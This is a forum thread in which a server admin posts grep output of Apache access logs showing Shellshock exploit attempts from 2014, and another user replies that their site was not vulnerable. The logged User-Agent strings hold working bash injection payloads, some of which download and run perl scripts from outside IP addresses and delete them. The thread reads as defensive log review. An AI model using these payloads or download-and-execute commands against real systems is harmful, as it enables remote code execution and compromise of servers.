Shell Shocked

General Forum

Moderator: Outfit Officer

Post Reply
User avatar
WeaselSqueezer
Posts: 434
Joined: July 22nd, 2004, 8:48 pm
Location: Ann Arbor, Michigan, USA

Shell Shocked

Post by WeaselSqueezer »

Here is a query to see who's been trying to hack this server with the bash bug:

Code: Select all

rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log.1
89.207.135.125 - - [25/Sep/2014:06:40:29 -0400] mail.mdve.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:06:42:05 -0400] * "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
94.75.234.44 - - [26/Sep/2014:08:59:35 -0400] 208.64.36.69 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.70 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.73 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.75 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
54.251.83.67 - - [27/Sep/2014:12:41:22 -0400] 208.64.36.75 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [27/Sep/2014:12:54:30 -0400] 208.64.36.73 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
54.251.83.67 - - [29/Sep/2014:01:59:25 -0400] 208.64.36.70 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [29/Sep/2014:07:25:02 -0400] 208.64.36.69 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
98.126.4.18 - - [01/Oct/2014:14:10:19 -0400] darkhq.com "GET /cgi-bin/hi HTTP/1.1" 404 284 "-" "() { :;};echo mizwkafnh7bvh6sk2dr2$(curl 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D'; wget -qO- 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D';)mizwkafnh7bvh6sk2dr2"
Ha ha, go away script kiddies, we're all patched here!
Image

Ponj
DARKie
Posts: 130
Joined: February 16th, 2014, 5:56 pm

Re: Shell Shocked

Post by Ponj »

WeaselSqueezer wrote: Ha ha, go away script kiddies, we're all patched here!
Lulz, we (player.me) were already never vulnerable to this because of us never using apache, cgi (fastcgi isn't vuln), nor exposing anything other than what was necessary. We actually did get quite a few attempts on day zero though, to no avail! :D
Image
Image

Image Image Image Image Image

Post Reply